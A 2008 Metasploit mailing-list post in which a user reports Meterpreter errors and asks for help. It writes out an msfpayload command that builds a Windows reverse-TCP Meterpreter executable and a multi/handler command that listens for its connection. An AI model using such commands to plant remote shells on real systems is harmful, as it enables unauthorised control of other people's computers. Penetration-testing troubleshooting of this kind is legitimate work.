Metasploit mailing list archives

Meterpeter Crashes

From: stewart_fey at yahoo.com (Stewart Fey)
Date: Wed, 16 Jul 2008 11:18:58 -0700 (PDT)

Several other problems have come up.? When I connect now and type help at the meterpreter> I only get the Core commands
starting with ?, channel. but no file system commands or networking commands as options.
On a FreeBSD box as the "evil" box when I run "use priv" I get errors and can't do anything else.? On a linux
backtracks box I can use "use priv" but get other errors.? When I typed run get_local_subnets I got the following
errors:
Error in script: undefined method 'config' for nil:NilClass.?
-The payload exe is being manually executed on "victim" computer and is not using any exploit.
- Using msf v3.2

these are the command I'm using to create and listen...
./msfpayload windows/meterpreter/reverse_tcp LPORT=80 LHOST=10.10.1.5 EXITFUNC=thread X > file.exe
and
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=80 LHOST=10.10.1.100 E
Suggestions?